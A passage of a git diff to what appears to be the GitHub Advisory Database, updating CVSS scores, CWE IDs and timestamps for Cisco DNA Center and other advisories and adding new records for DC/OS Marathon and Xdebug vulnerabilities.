"CWE-185", + "CWE-20" + ], + "severity": "HIGH", + "github_reviewed": true, + "github_reviewed_at": "2025-07-23T15:31:12Z", + "nvd_published_at": null + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2022/02/GHSA-86m6-8m8r-f858/GHSA-86m6-8m8r-f858.json b/advisories/unreviewed/2022/02/GHSA-86m6-8m8r-f858/GHSA-86m6-8m8r-f858.json index 413d51c10467e..65bd45636a860 100644 --- a/advisories/unreviewed/2022/02/GHSA-86m6-8m8r-f858/GHSA-86m6-8m8r-f858.json +++ b/advisories/unreviewed/2022/02/GHSA-86m6-8m8r-f858/GHSA-86m6-8m8r-f858.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-86m6-8m8r-f858", - "modified": "2022-02-18T00:00:55Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-02-11T00:00:45Z", "aliases": [ "CVE-2022-20630" ], "details": "A vulnerability in the audit log of Cisco DNA Center could allow an authenticated, local attacker to view sensitive information in clear text. This vulnerability is due to the unsecured logging of sensitive information on an affected system. An attacker with administrative privileges could exploit this vulnerability by accessing the audit logs through the CLI. A successful exploit could allow the attacker to retrieve sensitive information that includes user credentials.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-200", "CWE-532" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2022/05/GHSA-32x3-2qh2-v3w9/GHSA-32x3-2qh2-v3w9.json b/advisories/unreviewed/2022/05/GHSA-32x3-2qh2-v3w9/GHSA-32x3-2qh2-v3w9.json index 3d7cc2f525654..d8ae71ac1a667 100644 --- a/advisories/unreviewed/2022/05/GHSA-32x3-2qh2-v3w9/GHSA-32x3-2qh2-v3w9.json +++ b/advisories/unreviewed/2022/05/GHSA-32x3-2qh2-v3w9/GHSA-32x3-2qh2-v3w9.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-32x3-2qh2-v3w9", - "modified": "2022-05-24T17:39:39Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:39:39Z", "aliases": [ "CVE-2021-1265" ], - "details": " A vulnerability in the configuration archive functionality of Cisco DNA Center could allow any privilege-level authenticated, remote attacker to obtain the full unmasked running configuration of managed devices. The vulnerability is due to the configuration archives files being stored in clear text, which can be retrieved by various API calls. An attacker could exploit this vulnerability by authenticating to the device and executing a series of API calls. A successful exploit could allow the attacker to retrieve the full unmasked running configurations of managed devices. ", - "severity": [], + "details": "A vulnerability in the configuration archive functionality of Cisco DNA Center could allow any privilege-level authenticated, remote attacker to obtain the full unmasked running configuration of managed devices. The vulnerability is due to the configuration archives files being stored in clear text, which can be retrieved by various API calls. An attacker could exploit this vulnerability by authenticating to the device and executing a series of API calls. A successful exploit could allow the attacker to retrieve the full unmasked running configurations of managed devices.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-5g3w-62hr-p464/GHSA-5g3w-62hr-p464.json b/advisories/unreviewed/2022/05/GHSA-5g3w-62hr-p464/GHSA-5g3w-62hr-p464.json index 3c7aa01312533..5fe00f5829077 100644 --- a/advisories/unreviewed/2022/05/GHSA-5g3w-62hr-p464/GHSA-5g3w-62hr-p464.json +++ b/advisories/unreviewed/2022/05/GHSA-5g3w-62hr-p464/GHSA-5g3w-62hr-p464.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-5g3w-62hr-p464", - "modified": "2022-05-24T19:16:39Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T19:16:39Z", "aliases": [ "CVE-2021-34782" ], "details": "A vulnerability in the API endpoints for Cisco DNA Center could allow an authenticated, remote attacker to gain access to sensitive information that should be restricted. The attacker must have valid device credentials. This vulnerability is due to improper access controls on API endpoints. An attacker could exploit the vulnerability by sending a specific API request to an affected application. A successful exploit could allow the attacker to obtain sensitive information about other users who are configured with higher privileges on the application.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-202" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-6xfc-46hj-r3cf/GHSA-6xfc-46hj-r3cf.json b/advisories/unreviewed/2022/05/GHSA-6xfc-46hj-r3cf/GHSA-6xfc-46hj-r3cf.json index f106940bb2163..fc5ac515cba6e 100644 --- a/advisories/unreviewed/2022/05/GHSA-6xfc-46hj-r3cf/GHSA-6xfc-46hj-r3cf.json +++ b/advisories/unreviewed/2022/05/GHSA-6xfc-46hj-r3cf/GHSA-6xfc-46hj-r3cf.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-6xfc-46hj-r3cf", - "modified": "2022-05-24T17:39:01Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:39:01Z", "aliases": [ "CVE-2021-1130" ], "details": "A vulnerability in the web-based management interface of Cisco DNA Center software could allow an authenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerability exists because the web-based management interface does not properly validate user-supplied input. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the interface or access sensitive, browser-based information. To exploit this vulnerability, an attacker would need to have administrative credentials on the affected device.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-72j8-j6qp-6pfv/GHSA-72j8-j6qp-6pfv.json b/advisories/unreviewed/2022/05/GHSA-72j8-j6qp-6pfv/GHSA-72j8-j6qp-6pfv.json index 973baef7b5556..6cac8a70807e0 100644 --- a/advisories/unreviewed/2022/05/GHSA-72j8-j6qp-6pfv/GHSA-72j8-j6qp-6pfv.json +++ b/advisories/unreviewed/2022/05/GHSA-72j8-j6qp-6pfv/GHSA-72j8-j6qp-6pfv.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-72j8-j6qp-6pfv", - "modified": "2022-05-24T17:26:44Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:26:44Z", "aliases": [ "CVE-2020-3466" ], "details": "Multiple vulnerabilities in the web-based management interface of Cisco DNA Center software could allow an unauthenticated, remote attacker to conduct a cross-site scripting (XSS) attack against a user of the interface of an affected device. The vulnerabilities exist because the web-based management interface on an affected device does not properly validate user-supplied input. An attacker could exploit these vulnerabilities by persuading a user of the interface to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { @@ -20,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-79" + ], "severity": "MODERATE", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2022/05/GHSA-c27c-3q9w-fj4p/GHSA-c27c-3q9w-fj4p.json b/advisories/unreviewed/2022/05/GHSA-c27c-3q9w-fj4p/GHSA-c27c-3q9w-fj4p.json index 27ffe1f5aebce..ca0ede8369e8f 100644 --- a/advisories/unreviewed/2022/05/GHSA-c27c-3q9w-fj4p/GHSA-c27c-3q9w-fj4p.json +++ b/advisories/unreviewed/2022/05/GHSA-c27c-3q9w-fj4p/GHSA-c27c-3q9w-fj4p.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c27c-3q9w-fj4p", - "modified": "2022-05-24T17:39:40Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:39:40Z", "aliases": [ "CVE-2021-1303" ], - "details": "\n A vulnerability in the user management roles of Cisco DNA Center could allow an authenticated, remote attacker to execute unauthorized commands on an affected device.\n The vulnerability is due to improper enforcement of actions for assigned user roles. An attacker could exploit this vulnerability by authenticating as a user with an Observer role and executing commands on the affected device. A successful exploit could allow a user with the Observer role to execute commands to view diagnostic information of the devices that Cisco DNA Center manages.\n ", - "severity": [], + "details": "A vulnerability in the user management roles of Cisco DNA Center could allow an authenticated, remote attacker to execute unauthorized commands on an affected device.\n The vulnerability is due to improper enforcement of actions for assigned user roles. An attacker could exploit this vulnerability by authenticating as a user with an Observer role and executing commands on the affected device. A successful exploit could allow a user with the Observer role to execute commands to view diagnostic information of the devices that Cisco DNA Center manages.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-c46x-8q9c-r3vx/GHSA-c46x-8q9c-r3vx.json b/advisories/unreviewed/2022/05/GHSA-c46x-8q9c-r3vx/GHSA-c46x-8q9c-r3vx.json index 13a8f91a8cd7e..a2d9104f70ac1 100644 --- a/advisories/unreviewed/2022/05/GHSA-c46x-8q9c-r3vx/GHSA-c46x-8q9c-r3vx.json +++ b/advisories/unreviewed/2022/05/GHSA-c46x-8q9c-r3vx/GHSA-c46x-8q9c-r3vx.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-c46x-8q9c-r3vx", - "modified": "2022-05-24T19:06:34Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T19:06:34Z", "aliases": [ "CVE-2021-1134" ], "details": "A vulnerability in the Cisco Identity Services Engine (ISE) integration feature of the Cisco DNA Center Software could allow an unauthenticated, remote attacker to gain unauthorized access to sensitive data. The vulnerability is due to an incomplete validation of the X.509 certificate used when establishing a connection between DNA Center and an ISE server. An attacker could exploit this vulnerability by supplying a crafted certificate and could then intercept communications between the ISE and DNA Center. A successful exploit could allow the attacker to view and alter sensitive information that the ISE maintains about clients that are connected to the network.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:N" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-f87r-2g9r-6576/GHSA-f87r-2g9r-6576.json b/advisories/unreviewed/2022/05/GHSA-f87r-2g9r-6576/GHSA-f87r-2g9r-6576.json index 882c549b8f8c9..774760b489343 100644 --- a/advisories/unreviewed/2022/05/GHSA-f87r-2g9r-6576/GHSA-f87r-2g9r-6576.json +++ b/advisories/unreviewed/2022/05/GHSA-f87r-2g9r-6576/GHSA-f87r-2g9r-6576.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-f87r-2g9r-6576", - "modified": "2022-05-24T17:08:02Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:08:02Z", "aliases": [ "CVE-2019-15253" ], "details": "A vulnerability in the web-based management interface of Cisco Digital Network Architecture (DNA) Center could allow an authenticated, remote attacker to conduct a stored cross-site scripting (XSS) attack against a user of the web-based management interface of an affected device. The vulnerability is due to insufficient validation of user-supplied input by the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a user to click a crafted link. A successful exploit could allow the attacker to execute arbitrary script code in the context of the affected interface or access sensitive, browser-based information. To exploit this vulnerability, the attacker needs administrator credentials. This vulnerability affects Cisco DNA Center Software releases earlier than 1.3.0.6 and 1.3.1.4.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-j5x7-4h7r-4q2r/GHSA-j5x7-4h7r-4q2r.json b/advisories/unreviewed/2022/05/GHSA-j5x7-4h7r-4q2r/GHSA-j5x7-4h7r-4q2r.json index 663b9fd2e5e79..707792fb77b80 100644 --- a/advisories/unreviewed/2022/05/GHSA-j5x7-4h7r-4q2r/GHSA-j5x7-4h7r-4q2r.json +++ b/advisories/unreviewed/2022/05/GHSA-j5x7-4h7r-4q2r/GHSA-j5x7-4h7r-4q2r.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-j5x7-4h7r-4q2r", - "modified": "2022-05-24T17:39:39Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:39:39Z", "aliases": [ "CVE-2021-1264" ], - "details": "\n A vulnerability in the Command Runner tool of Cisco DNA Center could allow an authenticated, remote attacker to perform a command injection attack.\n The vulnerability is due to insufficient input validation by the Command Runner tool. An attacker could exploit this vulnerability by providing crafted input during command execution or via a crafted command runner API call. A successful exploit could allow the attacker to execute arbitrary CLI commands on devices managed by Cisco DNA Center.\n ", - "severity": [], + "details": "A vulnerability in the Command Runner tool of Cisco DNA Center could allow an authenticated, remote attacker to perform a command injection attack.\n The vulnerability is due to insufficient input validation by the Command Runner tool. An attacker could exploit this vulnerability by providing crafted input during command execution or via a crafted command runner API call. A successful exploit could allow the attacker to execute arbitrary CLI commands on devices managed by Cisco DNA Center.", + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H" + } + ], "affected": [], "references": [ { diff --git a/advisories/unreviewed/2022/05/GHSA-p8f4-vrqv-6cp2/GHSA-p8f4-vrqv-6cp2.json b/advisories/unreviewed/2022/05/GHSA-p8f4-vrqv-6cp2/GHSA-p8f4-vrqv-6cp2.json index e060d6d612d91..3defaaaa36f4a 100644 --- a/advisories/unreviewed/2022/05/GHSA-p8f4-vrqv-6cp2/GHSA-p8f4-vrqv-6cp2.json +++ b/advisories/unreviewed/2022/05/GHSA-p8f4-vrqv-6cp2/GHSA-p8f4-vrqv-6cp2.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-p8f4-vrqv-6cp2", - "modified": "2022-05-24T17:39:38Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:39:38Z", "aliases": [ "CVE-2021-1257" ], - "details": " A vulnerability in the web-based management interface of Cisco DNA Center Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to manipulate an authenticated user into executing malicious actions without their awareness or consent. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a web-based management user to follow a specially crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the device with the privileges of the authenticated user. These actions include modifying the device configuration, disconnecting the user's session, and executing Command Runner commands. ", + "details": "A vulnerability in the web-based management interface of Cisco DNA Center Software could allow an unauthenticated, remote attacker to conduct a cross-site request forgery (CSRF) attack to manipulate an authenticated user into executing malicious actions without their awareness or consent. The vulnerability is due to insufficient CSRF protections for the web-based management interface of an affected device. An attacker could exploit this vulnerability by persuading a web-based management user to follow a specially crafted link. A successful exploit could allow the attacker to perform arbitrary actions on the device with the privileges of the authenticated user. These actions include modifying the device configuration, disconnecting the user's session, and executing Command Runner commands.", "severity": [ { "type": "CVSS_V3", diff --git a/advisories/unreviewed/2022/05/GHSA-qv68-8f3p-28pf/GHSA-qv68-8f3p-28pf.json b/advisories/unreviewed/2022/05/GHSA-qv68-8f3p-28pf/GHSA-qv68-8f3p-28pf.json index 7b1ee0ce6e889..d6924ed9aaeb9 100644 --- a/advisories/unreviewed/2022/05/GHSA-qv68-8f3p-28pf/GHSA-qv68-8f3p-28pf.json +++ b/advisories/unreviewed/2022/05/GHSA-qv68-8f3p-28pf/GHSA-qv68-8f3p-28pf.json @@ -30,7 +30,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-20" + "CWE-20", + "CWE-441" ], "severity": "HIGH", "github_reviewed": false, diff --git a/advisories/unreviewed/2022/05/GHSA-qx4x-mchj-p2fq/GHSA-qx4x-mchj-p2fq.json b/advisories/unreviewed/2022/05/GHSA-qx4x-mchj-p2fq/GHSA-qx4x-mchj-p2fq.json index 7d27f649ff1f9..6ed1d9f547ac0 100644 --- a/advisories/unreviewed/2022/05/GHSA-qx4x-mchj-p2fq/GHSA-qx4x-mchj-p2fq.json +++ b/advisories/unreviewed/2022/05/GHSA-qx4x-mchj-p2fq/GHSA-qx4x-mchj-p2fq.json @@ -1,13 +1,18 @@ { "schema_version": "1.4.0", "id": "GHSA-qx4x-mchj-p2fq", - "modified": "2022-05-24T17:26:03Z", + "modified": "2025-07-23T15:31:07Z", "published": "2022-05-24T17:26:03Z", "aliases": [ "CVE-2020-3411" ], "details": "A vulnerability in Cisco DNA Center software could allow an unauthenticated remote attacker access to sensitive information on an affected system. The vulnerability is due to improper handling of authentication tokens by the affected software. An attacker could exploit this vulnerability by sending a crafted HTTP request to an affected device. A successful exploit could allow the attacker access to sensitive device information, which includes configuration files.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N" + } + ], "affected": [], "references": [ { @@ -21,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-200", "CWE-287" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2023/03/GHSA-3ff8-m2gm-qf6j/GHSA-3ff8-m2gm-qf6j.json b/advisories/unreviewed/2023/03/GHSA-3ff8-m2gm-qf6j/GHSA-3ff8-m2gm-qf6j.json index 4c18d65d8b86d..8bcdc5778971c 100644 --- a/advisories/unreviewed/2023/03/GHSA-3ff8-m2gm-qf6j/GHSA-3ff8-m2gm-qf6j.json +++ b/advisories/unreviewed/2023/03/GHSA-3ff8-m2gm-qf6j/GHSA-3ff8-m2gm-qf6j.json @@ -25,7 +25,9 @@ } ], "database_specific": { - "cwe_ids": [], + "cwe_ids": [ + "CWE-200" + ], "severity": "HIGH", "github_reviewed": false, "github_reviewed_at": null, diff --git a/advisories/unreviewed/2023/03/GHSA-723j-vwr2-6865/GHSA-723j-vwr2-6865.json b/advisories/unreviewed/2023/03/GHSA-723j-vwr2-6865/GHSA-723j-vwr2-6865.json index eca5c4aa708d3..565e6d249d7e1 100644 --- a/advisories/unreviewed/2023/03/GHSA-723j-vwr2-6865/GHSA-723j-vwr2-6865.json +++ b/advisories/unreviewed/2023/03/GHSA-723j-vwr2-6865/GHSA-723j-vwr2-6865.json @@ -26,7 +26,8 @@ ], "database_specific": { "cwe_ids": [ - "CWE-312" + "CWE-312", + "CWE-555" ], "severity": "MODERATE", "github_reviewed": false, diff --git a/advisories/unreviewed/2023/05/GHSA-pxxg-fr9h-vhvr/GHSA-pxxg-fr9h-vhvr.json b/advisories/unreviewed/2023/05/GHSA-pxxg-fr9h-vhvr/GHSA-pxxg-fr9h-vhvr.json index d04c418e51c4e..13504478b93c8 100644 --- a/advisories/unreviewed/2023/05/GHSA-pxxg-fr9h-vhvr/GHSA-pxxg-fr9h-vhvr.json +++ b/advisories/unreviewed/2023/05/GHSA-pxxg-fr9h-vhvr/GHSA-pxxg-fr9h-vhvr.json @@ -26,6 +26,7 @@ ], "database_specific": { "cwe_ids": [ + "CWE-20", "CWE-285" ], "severity": "MODERATE", diff --git a/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json b/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json index e8c11836578c4..1d30f17adde8d 100644 --- a/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json +++ b/advisories/unreviewed/2024/02/GHSA-xgm2-cpgm-525v/GHSA-xgm2-cpgm-525v.json @@ -1,12 +1,12 @@ { "schema_version": "1.4.0", "id": "GHSA-xgm2-cpgm-525v", - "modified": "2024-02-16T18:31:04Z", + "modified": "2025-07-23T15:31:08Z", "published": "2024-02-16T18:31:04Z", "aliases": [ "CVE-2024-23591" ], - "details": "ThinkSystem SR670V2 servers manufactured from approximately June 2021 to July 2023 were left in Manufacturing Mode which could allow \n\nan attacker with privileged logical access to the host or physical access to server internals to modify or disable Intel Boot Guard firmware integrity, SPS security, and other SPS configuration setting.\n\n", + "details": "ThinkSystem SR670V2 servers manufactured from approximately June 2021 to July 2023 were left in Manufacturing Mode which could allow \n\nan attacker with privileged logical access to the host or physical access to server internals to modify or disable Intel Boot Guard firmware integrity, SPS security, and other SPS configuration setting.", "severity": [ { "type": "CVSS_V3", @@ -22,6 +22,10 @@ { "type": "WEB", "url": "https://https://support.lenovo.com/us/en/product_security/LEN-150020" + }, + { + "type": "WEB", + "url": "https://support.lenovo.com/us/en/product_security/LEN-150020" } ], "database_specific": { diff --git a/advisories/unreviewed/2024/06/GHSA-c445-694v-cp45/GHSA-c445-694v-cp45.json b/advisories/unreviewed/2024/06/GHSA-c445-694v-cp45/GHSA-c445-694v-cp45.json index dafd0f17c43bf..220888535f391 100644 --- a/advisories/unreviewed/2024/06/GHSA-c445-694v-cp45/GHSA-c445-694v-cp45.json +++ b/advisories/unreviewed/2024/06/GHSA-c445-694v-cp45/GHSA-c445-694v-cp45.json @@ -1,13 +1,22 @@ { "schema_version": "1.4.0", "id": "GHSA-c445-694v-cp45", - "modified": "2024-06-18T09:31:10Z", + "modified": "2025-07-23T15:31:08Z", "published": "2024-06-18T09:31:10Z", "aliases": [ "CVE-2024-5899" ], "details": "When Bazel Plugin in intellij imports a project (either using \"import project\" or \"Auto import\") the dialog for trusting the project is not displayed. This comes from the fact that both call the method ProjectBuilder.createProject which then calls ProjectManager.getInstance().createProject. This method, as its name suggests is intended to create a new project, not to import an existing one. \nWe recommend upgrading to version 2024.06.04.0.2 or beyond for the IntelliJ, CLion and Android Studio Bazel plugins.", - "severity": [], + "severity": [ + { + "type": "CVSS_V3", + "score": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N" + }, + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:A/VC:L/VI:L/VA:N/SC:L/SI:L/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], "affected": [], "references": [ { @@ -27,7 +36,7 @@ "cwe_ids": [ "CWE-20" ], - "severity": null, + "severity": "LOW", "github_reviewed": false, "github_reviewed_at": null, "nvd_published_at": "2024-06-18T09:15:09Z" diff --git a/advisories/unreviewed/2025/04/GHSA-p7jp-69j5-crrv/GHSA-p7jp-69j5-crrv.json b/advisories/unreviewed/2025/04/GHSA-p7jp-69j5-crrv/GHSA-p7jp-69j5-crrv.json index 45d02a24a89a4..c197f1c341a02 100644 --- a/advisories/unreviewed/2025/04/GHSA-p7jp-69j5-crrv/GHSA-p7jp-69j5-crrv.json +++ b/advisories/unreviewed/2025/04/GHSA-p7jp-69j5-crrv/GHSA-p7jp-69j5-crrv.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-p7jp-69j5-crrv", - "modified": "2025-04-08T15:31:02Z", + "modified": "2025-07-23T15:31:09Z", "published": "2025-04-07T21:32:08Z", "aliases": [ "CVE-2025-29480" @@ -19,6 +19,10 @@ "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2025-29480" }, + { + "type": "WEB", + "url": "https://github.com/OSGeo/gdal/issues/12188#issuecomment-2847873794" + }, { "type": "WEB", "url": "https://github.com/lmarch2/poc/blob/main/gdal/gdal.md" diff --git a/advisories/unreviewed/2025/05/GHSA-c2mm-9c32-xc37/GHSA-c2mm-9c32-xc37.json b/advisories/unreviewed/2025/05/GHSA-c2mm-9c32-xc37/GHSA-c2mm-9c32-xc37.json index 9a541701af241..db821e5c79524 100644 --- a/advisories/unreviewed/2025/05/GHSA-c2mm-9c32-xc37/GHSA-c2mm-9c32-xc37.json +++ b/advisories/unreviewed/2025/05/GHSA-c2mm-9c32-xc37/GHSA-c2mm-9c32-xc37.json @@ -1,7 +1,7 @@ { "schema_version": "1.4.0", "id": "GHSA-c2mm-9c32-xc37", - "modified": "2025-05-06T03:30:24Z", + "modified": "2025-07-23T15:31:09Z", "published": "2025-05-05T15:30:53Z", "aliases": [ "CVE-2025-47268" @@ -34,6 +34,10 @@ { "type": "WEB", "url": "https://github.com/Zephkek/ping-rtt-overflow" + }, + { + "type": "WEB", + "url": "https://github.com/iputils/iputils/releases/tag/20250602" } ], "database_specific": { diff --git a/advisories/unreviewed/2025/07/GHSA-24rw-3m8c-crv2/GHSA-24rw-3m8c-crv2.json b/advisories/unreviewed/2025/07/GHSA-24rw-3m8c-crv2/GHSA-24rw-3m8c-crv2.json new file mode 100644 index 0000000000000..e97ecad5d810d --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-24rw-3m8c-crv2/GHSA-24rw-3m8c-crv2.json @@ -0,0 +1,52 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-24rw-3m8c-crv2", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2017-20198" + ], + "details": "The Marathon UI in DC/OS < 1.9.0 allows unauthenticated users to deploy arbitrary Docker containers. Due to improper restriction of volume mount configurations, attackers can deploy a container that mounts the host's root filesystem (/) with read/write privileges. When using a malicious Docker image, the attacker can write to /etc/cron.d/ on the host, achieving arbitrary code execution with root privileges. This impacts any system where the Docker daemon honors Marathon container configurations without policy enforcement.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2017-20198" + }, + { + "type": "WEB", + "url": "https://dcos.io" + }, + { + "type": "WEB", + "url": "https://raw.githubusercontent.com/rapid7/metasploit-framework/master/modules/exploits/linux/http/dcos_marathon.rb" + }, + { + "type": "WEB", + "url": "https://web.archive.org/web/20230609134421/https://warroom.rsmus.com/dcos-marathon-compromise" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/42134" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/dcos-marathon-docker-mount-abuse-rce" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-732" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:32Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-267w-63f8-m896/GHSA-267w-63f8-m896.json b/advisories/unreviewed/2025/07/GHSA-267w-63f8-m896/GHSA-267w-63f8-m896.json new file mode 100644 index 0000000000000..a80b0467a8b9c --- /dev/null +++ b/advisories/unreviewed/2025/07/GHSA-267w-63f8-m896/GHSA-267w-63f8-m896.json @@ -0,0 +1,56 @@ +{ + "schema_version": "1.4.0", + "id": "GHSA-267w-63f8-m896", + "modified": "2025-07-23T15:31:13Z", + "published": "2025-07-23T15:31:13Z", + "aliases": [ + "CVE-2015-10141" + ], + "details": "An unauthenticated OS command injection vulnerability exists within Xdebug versions 2.5.5 and earlier, a PHP debugging extension developed by Derick Rethans. When remote debugging is enabled, Xdebug listens on port 9000 and accepts debugger protocol commands without authentication. An attacker can send a crafted eval command over this interface to execute arbitrary PHP code, which may invoke system-level functions such as system() or passthru(). This results in full compromise of the host under the privileges of the web server user.", + "severity": [ + { + "type": "CVSS_V4", + "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:H/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X" + } + ], + "affected": [], + "references": [ + { + "type": "ADVISORY", + "url": "https://nvd.nist.gov/vuln/detail/CVE-2015-10141" + }, + { + "type": "WEB", + "url": "https://kirtixs.com/blog/2015/11/13/xpwn-exploiting-xdebug-enabled-servers" + }, + { + "type": "WEB", + "url": "https://www.exploit-db.com/exploits/44568" + }, + { + "type": "WEB", + "url": "https://www.fortiguard.com/encyclopedia/ips/46000" + }, + { + "type": "WEB", + "url": "https://www.vulncheck.com/advisories/xdebug-remote-debugger-unauth-os-command-execution" + }, + { + "type": "WEB", + "url": "https://xdebug.org" + }, + { + "type": "WEB", + "url": "http://web.archive.org/web/20231226215418/https://paper.seebug.org/397" + } + ], + "database_specific": { + "cwe_ids": [ + "CWE-78" + ], + "severity": "CRITICAL", + "github_reviewed": false, + "github_reviewed_at": null, + "nvd_published_at": "2025-07-23T14:15:31Z" + } +} \ No newline at end of file diff --git a/advisories/unreviewed/2025/07/GHSA-2fhm-pcv6-vcx9/GHSA-2fhm-pcv6-vcx9.json b/advisories/unreviewed/2025/07/GHSA-2fhm-pcv6-vcx9/GHSA-2fhm-pcv6-vcx9.json index 78f75982eff0c..9ffece61e415f 100644 --- a/advisories/unreviewed/2025/07/GHSA-2fhm-pcv6-vcx9/GHSA-2fhm-pcv6-vcx9.json +++ 